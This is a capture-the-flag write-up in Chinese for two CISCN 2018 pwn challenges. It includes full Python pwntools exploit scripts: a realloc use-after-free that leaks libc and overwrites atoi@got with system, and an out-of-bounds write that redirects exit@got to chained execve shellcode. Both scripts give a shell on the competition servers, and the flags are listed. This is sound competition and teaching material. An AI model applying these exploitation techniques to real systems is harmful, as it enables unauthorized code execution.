ciscn2018-pwn-wp
阿新 • • 發佈:2018-08-04
2018全國大學生網絡安全競賽，做了 2 道題
task_supermarket
change_desc
裏面調用 realloc
會觸發 uaf
利用 uaf 修改 obj->desc_ptr 為 atoi@got , 泄露 libc, 使用 libc-database 找到相應的 libc
修改 atoi@got 為 system ,然後 輸入 sh , getshell
# Exploit script for task_supermarket, as used in the writeup above.
# Written for Python 2 pwntools: str literals are concatenated with the
# output of p32(), which would be bytes (and a TypeError) under Python 3.
# The script was pasted onto a single line; only line breaks and the
# mis-encoded quote characters have been restored here.
from pwn import *
from time import sleep

context(os='linux', log_level='info')
context.terminal = ['tmux', 'splitw', '-h']

# Local run is left commented out; the remote is the competition instance.
# p = process("./task_supermarket")
p = remote("117.78.43.197", 32138)


def add(name, price, descrip_size, description):
    """Menu option 1: create an item with the given name, price and description.

    The sleep() calls only pace the sends; the numeric arguments are sent as
    decimal strings and `description` is sent raw (no trailing newline added).
    """
    sleep(0.2)
    p.recvuntil("your choice>> ")
    p.sendline('1')
    p.recvuntil("name:")
    sleep(0.2)
    p.sendline(name)
    p.recvuntil("price:")
    sleep(0.2)
    p.sendline(str(price))
    p.recvuntil("descrip_size:")
    sleep(0.2)
    p.sendline(str(descrip_size))
    p.recvuntil("description:")
    sleep(0.1)
    p.send(description)


def free(name):
    """Menu option 2: delete the item called `name` (defined but not used below)."""
    p.recvuntil("your choice>> ")
    p.sendline('2')
    p.recvuntil("name:")
    sleep(0.2)
    p.sendline(name)


def list():
    """Menu option 3: print all items.

    NOTE: this shadows the builtin `list`; harmless here only because the
    builtin is never used in this script.
    """
    p.recvuntil("your choice>> ")
    p.sendline('3')


def change_price(name, value):
    """Menu option 4: adjust an item's price (defined but not used below)."""
    p.recvuntil("your choice>> ")
    p.sendline('4')
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("input the value you want to cut or rise in:")
    p.sendline(str(value))


def change_desc(name, descrip_size, description):
    """Menu option 5: replace an item's description.

    Per the writeup, this is the handler that calls realloc and therefore
    leaves a dangling description pointer (the UAF the rest of the script
    relies on).
    """
    p.recvuntil("your choice>> ")
    p.sendline('5')
    p.recvuntil("name:")
    sleep(0.2)
    p.sendline(name)
    p.recvuntil("descrip_size:")
    sleep(0.2)
    p.sendline(str(descrip_size))
    p.recvuntil("description:")
    sleep(0.2)
    p.send(description)


# Heap setup: four items with 0x1c-byte descriptions, then grow item 1's
# description (the realloc path), then two more items.  The exact chunk
# layout this produces is not derivable from the script alone — presumably
# it is what lets the later writes land on another item's object.
add('0', 80, 0x1c, '\n')
add('1', 80, 0x1c, '\n')
add('2', 80, 0x1c, '\n')
add('3', 80, 0x1c, '\n')
change_desc('1', 0x30, '\n')
add('4', 80, 0x1c, '\n')
add('5', 80, 0x80, '\n')

read_got = 0x0804B010  # defined but unused
atoi_got = 0x0804B048  # GOT entry leaked and later overwritten below

# First write through item 1's stale description pointer.  The constants
# (0x34, 0x50) look like size/field values for the overlapped object —
# TODO confirm against the binary's struct layout.
payload = p32(0x34)
payload += p32(0) * 3
payload += p32(0x50)
payload += '\x90\n'
change_desc('1', 0x1c, payload)

# Second write: fake a chunk header (0x21) followed by an object whose last
# field is atoi_got.  Per the writeup this field is obj->desc_ptr, so
# listing the items prints the bytes at atoi@got.
payload = '\x00' * (0x20 - 8)
payload += p32(0)
payload += p32(0x21)
payload += p32(0x35)
payload += p32(0) * 3
payload += p32(0x50)
payload += p32(0x90)
payload += p32(atoi_got)
change_desc('4', 0x90, payload + '\n')

# Leak: the 4 bytes printed right after item 5's prefix are atoi's address.
list()
p.recvuntil("5: price.80, des.")
# Hard-coded path on the author's machine; the matching libc was found with
# libc-database as described in the writeup.
libc = ELF("/home/haclh/workplace/libc-database/db/libc6-i386_2.23-0ubuntu9_amd64.so")
leak = u32(p.recv(4))
libc.address = leak - libc.symbols['atoi']
info("libc: " + hex(libc.address))
info("leak: " + hex(leak))

# Item 5's description now points at atoi@got; writing system's address
# there replaces atoi, so the next menu input ("sh") is passed to system.
payload = p32(libc.symbols['system'])
change_desc('5', 0x90, payload + '\n')
# gdb.attach(p)
# pause()
p.recvuntil("your choice>> ")
p.sendline("sh")
p.interactive()
flag: ciscn{1beba07b6a3232220b92429c6a0ac1e4}
task_note_service2
add 的時候會越界。
程序沒開 nx，利用越界改 exit@got 為堆地址，然後布置 shellcode。由於大小受到嚴格控制，使用短跳轉連接各條 shellcode 需要的語句。用到的 shellcode 為
; Shellcode listing from the writeup, restored to one instruction per line.
; In the exploit script below it is split into short fragments that are
; chained with short jumps (see the inline comments there).
xor esi, esi
push rsi
push rsi
mov ebx, 0x6e69622f
mov [rsp], ebx
mov ebx, 0x68732f2f
mov [rsp+4], ebx
mov rdi, rsp
push 0x3b
pop rax
xor rdx,rdx
syscall
最終 exp
# Exploit script for task_note_service2, as used in the writeup above.
# Written for Python 2 pwntools (raw str payloads passed to p.send()).
# The script was pasted onto a single line; only line breaks and the
# mis-encoded quote characters have been restored here.
from pwn import *
from time import sleep

context(os='linux', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']

# Local run is left commented out; the remote is the competition instance.
# p = process("./task_note_service2")
p = remote("49.4.23.165", 32510)

# Only used to build gdb_command below; presumably the PIE base seen under
# the debugger with ASLR disabled — TODO confirm.
base = 0x555555554000


def add(idx, content):
    """Menu option 1: store `content` at note index `idx`.

    The size sent is len(content); `content` is sent raw.  Per the writeup
    the index is not bounds-checked, which is why a negative index is used
    below.
    """
    sleep(0.2)
    p.recvuntil("your choice>> ")
    p.sendline('1')
    p.recvuntil("index:")
    sleep(0.2)
    p.sendline(str(idx))
    p.recvuntil("size:")
    sleep(0.2)
    p.sendline(str(len(content)))
    p.recvuntil("content:")
    sleep(0.2)
    p.send(content)


def free(idx):
    """Menu option 2: delete note `idx` (defined but not used below)."""
    p.recvuntil("your choice>> ")
    p.sendline('2')
    p.recvuntil("index:")
    sleep(0.2)
    p.sendline(str(idx))


# Debugger script for the commented-out gdb.attach() call below.
gdb_command = '''
x/20xg {}
break *0x0000555555757030
c
'''.format(hex(base + 0x2020A0))

# Each note holds one fragment of the shellcode listed above, ending in a
# short jump (\xeb\x19) to the next fragment; the last fragment ends with
# the syscall.  Index -7 is the out-of-bounds write that, per the writeup,
# redirects exit@got to the first fragment.
add(-7, '\x90\x31\xf6\x56\x56\xeb\x19\n')  # exit ---> shellcode
add(0, '\xbb\x2f\x62\x69\x6e\xeb\x19\n')  # push
add(1, '\x90\x90\x89\x1c\x24\xeb\x19\n')  # push
add(2, '\xbb\x2f\x2f\x73\x68\xeb\x19\n')  # push
add(3, '\x89\x5c\x24\x04\x90\xeb\x19\n')  # push
add(4, '\x48\x89\xe7\x6a\x3b\xeb\x19\n')  # push
add(5, '\x58\x48\x31\xd2\x0f\x05\n')  # push

# gdb.attach(p, gdb_command)
# pause()
# Menu option 5 is the exit path, which now goes through the overwritten GOT entry.
p.recvuntil("your choice>>")
p.sendline("5")
p.interactive()

# Assembly of the fragments above, kept by the author as a bare string.
'''
xor esi, esi
push rsi
push rsi
mov ebx, 0x6e69622f
mov [rsp], ebx
mov ebx, 0x68732f2f
mov [rsp+4], ebx
mov rdi, rsp
push 0x3b
pop rax
xor rdx,rdx
syscall
'''
flag: ciscn{133fb0f0ca3ddf24964975f1ab94d082}